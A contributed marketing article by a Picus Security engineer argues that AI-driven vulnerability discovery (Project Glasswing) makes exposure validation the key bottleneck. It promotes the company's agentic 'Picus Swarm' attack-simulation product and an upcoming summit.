At Picus Security, we build a platform for Autonomous Exposure Validation. So, full disclosure, I have a perspective here that comes with an inherent bias. Take it accordingly.
What Glasswing crystallized for us, and for a lot of the CISOs we've been speaking with, is that the validation step within any exposure management program just became the most critical bottleneck.
Finding vulnerabilities is about to get radically easier and more efficient.
Patching them is going to remain painfully slow.
The only lever you can pull in between is knowing which ones actually matter to your environment. That's validation.
From Four Days to Three Minutes: How Agentic Workflows Change the Cycle
We built Picus Swarm, the AI team powering autonomous, real-time validation, to compress the traditional four-day cycle into minutes.
It's a set of AI agents that work together to do what used to require handoffs between four separate teams:
A researcher agent ingests and vets threat intelligence.
A red teamer agent maps it against your environment to generate a safety-checked attacker playbook.
A simulator agent executes across your actual endpoints and cloud, gathering telemetry and proof data.
A coordinator agent bridges findings to remediation, opening tickets, triggering SOAR playbooks, pushing indicators of attack to your EDR, and re-validating after fixes land.
Every action is traceable and auditable, and every agent operates within guardrails you define.
The whole chain, from a new CISA alert to validated, remediation-ready findings, runs in about three minutes.
When a Mythos-class model drops thousands of findings on your organization, you need something that can immediately tell you which of these are exploitable in your environment. Which controls would hold, which would fail, and what's the vendor-specific fix?
The Uncomfortable Truth
Project Glasswing is going to be measured by one metric: how many vulnerabilities get patched before they get exploited. Not how many are found, not how impressive the exploit chains are, but whether the ecosystem can digest what AI is about to produce.
Visibility alone has never been enough: 83% of cybersecurity programs still show no measurable results. What’s changing the equation is closing the gap between seeing and proving: knowing whether a potential vulnerability would actually compromise your environment.
That's validation.
And in a post-Glasswing world, it's the only thing standing between a flood of discoveries and a flood of breaches.
We're hosting the Autonomous Validation Summit on May 12 & 14 with Frost & Sullivan, featuring practitioners from Kraft Heinz and Glow Financial Services, along with our CTO, Volkan Erturk. Together, we’ll be taking a deeper dive into this specific problem.
Note: This article was written by Sıla Özeren Hacıoğlu, Security Research Engineer at Picus Security.
This article is a contributed piece from one of our valued partners.
from The Hacker News https://ift.tt/zt1dSha